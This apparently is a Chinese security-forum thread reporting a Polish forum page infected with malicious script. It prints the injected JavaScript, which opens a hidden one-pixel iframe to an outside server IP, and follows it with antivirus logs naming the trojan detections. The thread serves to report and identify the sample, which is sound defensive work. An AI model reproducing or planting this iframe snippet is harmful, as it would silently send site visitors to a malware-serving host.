http://forum.ogar900.pl/tuning-mechaniczny-koszty-vt2132.htm

显示全部楼层 · 发表于 2013-9-1 16:25:42

本帖最后由 fireold 于 2013-9-1 16:26 编辑

(function() {
var r = document.createElement('iframe');
r.src = 'http://188.128.137.211/esd.php';
r.style.position = 'absolute';
r.style.border = '0';
r.style.height = '1px';
r.style.width = '1px';
r.style.left = '1px';
r.style.top = '1px';
if (!document.getElementById('r')) {
document.write('<div id=\'r\'></div>');
document.getElementById('r').appendChild(r);
}
})();

复制代码

Avira

2013/9/1 下午 04:21 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\STITT9OQ\tuning-mechaniczny-koszty-vt2132[1].htm'
   包含病毒或有害的程式 'JS/Agent.aal.52' [virus]
   已採取動作：
   檔案會移動至 '577c5596.qua' 名稱底下的隔離區目錄。.

2013/9/1 下午 04:21 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 812
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/9/1 下午 04:20 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\STITT9OQ\jsscripts[1].js'
   包含病毒或有害的程式 'JS/iFrame.kpp' [virus]
   已採取動作：
   檔案會移動至 '55ac5802.qua' 名稱底下的隔離區目錄。.

2013/9/1 下午 04:20 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\G3WIV5EU\rmw_jslib[1].js'
   包含病毒或有害的程式 'JS/iFrame.kpp' [virus]
   已採取動作：
   檔案會移動至 '4d3777af.qua' 名稱底下的隔離區目錄。.

2013/9/1 下午 04:20 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 813
   目錄數： 0
   惡意程式碼數： 2
   警告數： 0

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\G3WIV5EU\rmw_jslib[1].js 中
   偵測到病毒或有害的程式 'JS/iFrame.kpp [virus]'
   執行的動作：傳輸至掃描程式

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\G3WIV5EU\rmw_jslib[1].js 中
   偵測到病毒或有害的程式 'JS/iFrame.kpp [virus]'
   執行的動作：拒絕存取

2013/9/1 下午 04:20 [Web Protection] 發現惡意程式碼
   從 URL "http://forum.ogar900.pl/images/rmw_jslib.js" 存取資料時，
   發現病毒或有害的程式 'JS/iFrame.kpp' [virus]。
   已採取動作：已略過

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\STITT9OQ\jsscripts[1].js 中
   偵測到病毒或有害的程式 'JS/iFrame.kpp [virus]'
   執行的動作：傳輸至掃描程式

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\STITT9OQ\jsscripts[1].js 中
   偵測到病毒或有害的程式 'JS/iFrame.kpp [virus]'
   執行的動作：拒絕存取

2013/9/1 下午 04:20 [Web Protection] 發現惡意程式碼
   從 URL "http://forum.ogar900.pl/images/jsscripts.js" 存取資料時，
   發現病毒或有害的程式 'JS/iFrame.kpp' [virus]。
   已採取動作：已略過

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\STITT9OQ\tuning-mechaniczny-koszty-vt2132[1].htm 中
   偵測到病毒或有害的程式 'JS/Agent.aal.52 [virus]'
   執行的動作：傳輸至掃描程式

2013/9/1 下午 04:20 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\STITT9OQ\tuning-mechaniczny-koszty-vt2132[1].htm 中
   偵測到病毒或有害的程式 'JS/Agent.aal.52 [virus]'
   執行的動作：拒絕存取

2013/9/1 下午 04:20 [Web Protection] 發現惡意程式碼
   從 URL "http://forum.ogar900.pl/tuning-mechaniczny-koszty-vt2132.htm" 存取資料時，
   發現病毒或有害的程式 'JS/Agent.aal.52' [virus]。
   已採取動作：已略過

显示全部楼层 · 发表于 2013-9-1 18:04:12

还有效吗？有效的话告诉我好么

显示全部楼层 · 发表于 2013-9-1 20:09:44

GreenCodes 发表于 2013-9-1 18:04
还有效吗？有效的话告诉我好么

单开AV

显示全部楼层 · 发表于 2013-9-1 21:14:13

本帖最后由 GreenCodes 于 2013-9-1 21:27 编辑

墨家小子发表于 2013-9-1 20:09
单开AV

今天运气真背

实机一次就被过

这玩意是干嘛的，自动加书签？

显示全部楼层 · 发表于 2013-9-1 22:47:22

ESET SMART SECURITY
2013/9/1 22:43:24 HTTP 过滤器压缩文件 http://forum.ogar900.pl/images/rmw_jslib.js JS/Iframe.GJ 特洛伊木马连接中断 - 已隔离 NT AUTHORITY\ANONYMOUS LOGON 通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:43:24 HTTP 过滤器压缩文件 http://forum.ogar900.pl/images/jsscripts.js JS/Iframe.GJ 特洛伊木马连接中断 - 已隔离 NT AUTHORITY\ANONYMOUS LOGON 通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:43:22 HTTP 过滤器压缩文件 http://forum.ogar900.pl/tuning-mechaniczny-koszty-vt2132.htm JS/Iframe.GJ 特洛伊木马连接中断 - 已隔离 NT AUTHORITY\ANONYMOUS LOGON 通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:37:05 文件系统实时防护文件 C:\Users\zw\Downloads\未确认 624951.crdownload Win32/LockScreen.AQD 特洛伊木马已删除 zw-PC\zw 在被应用程序修改的文件上发生事件: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:36:45 HTTP 过滤器文件 https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjIyMDgx Win32/LockScreen.AQD 特洛伊木马连接中断 - 已隔离 zw-PC\zw 通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:33:39 文件系统实时防护文件 \Device\HarddiskVolume2\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\23629939.bat BAT/Small.NAN 特洛伊木马通过删除清除 - 已隔离 NT AUTHORITY\ANONYMOUS LOGON 在应用程序新建的文件上发生事件: C:\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\Rar$EXa0.670\RUqSlBT.exe.
2013/9/1 22:33:11 文件系统实时防护文件 \Device\HarddiskVolume2\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\23602951.bat BAT/Small.NAN 特洛伊木马通过删除清除 - 已隔离 NT AUTHORITY\ANONYMOUS LOGON 在应用程序新建的文件上发生事件: C:\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\Rar$EXa0.925\RUqSlBT.exe.
2013/9/1 22:31:20 文件系统实时防护文件 \Device\HarddiskVolume2\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\23491270.bat BAT/Small.NAN 特洛伊木马通过删除清除 - 已隔离 NT AUTHORITY\ANONYMOUS LOGON 在应用程序新建的文件上发生事件: C:\Sandbox\zw\DefaultBox\user\current\AppData\Local\Temp\Rar$EXa0.759\RUqSlBT.exe.
2013/9/1 22:26:57 文件系统实时防护文件 C:\Users\zw\Downloads\未确认 622603.crdownload Win32/Kryptik.BJII 特洛伊木马的变种已删除 zw-PC\zw 在被应用程序修改的文件上发生事件: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:26:38 HTTP 过滤器文件 https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjIyMTE2 Win32/Kryptik.BJII 特洛伊木马的变种连接中断 - 已隔离 zw-PC\zw 通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.
2013/9/1 22:14:16 HTTP 过滤器文件 https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjIyMjI0 PHP/Obfuscated.F 潜在的不受欢迎应用程序连接中断 - 已隔离 zw-PC\zw 通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Internet Download Manager\IDMan.exe.
2013/9/1 22:10:53 HTTP 过滤器文件 https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjIyMjU5 Win32/Dorkbot.B 蠕虫连接中断 - 已隔离 zw-PC\zw 通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Internet Download Manager\IDMan.exe.
2013/9/1 22:10:34 HTTP 过滤器文件 https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjIyMjU5 Win32/Injector.ALTZ 特洛伊木马的变种连接中断 - 已隔离 zw-PC\zw 通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Internet Download Manager\IDMan.exe.
2013/9/1 21:04:20 HTTP 过滤器文件 https://att.kafan.cn/forum.php?mo ... DY2OTY2NnwxNjE5NjUw Win32/Reveton.U 特洛伊木马连接中断 - 已隔离 zw-PC\zw 通过应用程序访问 web 时检测到威胁: C:\Program Files (x86)\Internet Download Manager\IDMan.exe.

显示全部楼层 · 发表于 2013-9-2 09:10:16

GreenCodes 发表于 2013-9-1 21:14
今天运气真背实机一次就被过这玩意是干嘛的，自动加书签？

我关闭AV进去还真没发现什么

显示全部楼层 · 发表于 2013-9-2 09:31:43

墨家小子发表于 2013-9-2 09:10
我关闭AV进去还真没发现什么

还好运气不错

显示全部楼层 · 发表于 2013-9-2 09:33:56

GreenCodes 发表于 2013-9-2 09:31
还好运气不错

你杯具了吗？

****************** Sophos Anti-Virus 日志记录 - 2013/9/2 1:32:54 **************

...
20130902 013227 文件"C:\Sandbox\AA\SogouExplorer\user\current\AppData\Roaming\SogouExplorer\Webkit\SEIE\4576\0\rmw_jslib.js"属于病毒/间谍软件 'Troj/JSRedir-JT'。
20130902 013227 文件"C:\Sandbox\AA\SogouExplorer\user\current\AppData\Roaming\SogouExplorer\Webkit\SEIE\4576\0\jsscripts.js"属于病毒/间谍软件 'Troj/JSRedir-JT'。
20130902 013237 文件"C:\Sandbox\AA\SogouExplorer\user\current\AppData\Roaming\SogouExplorer\Webkit\SEIE\4576\0\jsscripts.js"属于病毒/间谍软件 'Troj/JSRedir-JT'。
20130902 013241 文件"C:\Sandbox\AA\SogouExplorer\user\current\AppData\Roaming\SogouExplorer\Webkit\SEIE\4576\0\rmw_jslib.js"属于病毒/间谍软件 'Troj/JSRedir-JT'。
(4 个项目)

显示全部楼层 · 发表于 2013-9-2 09:35:27

墨家小子发表于 2013-9-2 09:33
你杯具了吗？

****************** Sophos Anti-Virus 日志记录 - 2013/9/2 1:32:54 *********** ...

我想知道症状啊

我也不知道有没有悲剧哦

显示全部楼层 · 发表于 2013-9-2 09:37:00

GreenCodes 发表于 2013-9-2 09:35
我想知道症状啊我也不知道有没有悲剧哦

这样

[已鉴定] http://forum.ogar900.pl/tuning-mechaniczny-koszty-vt2132.htm

评分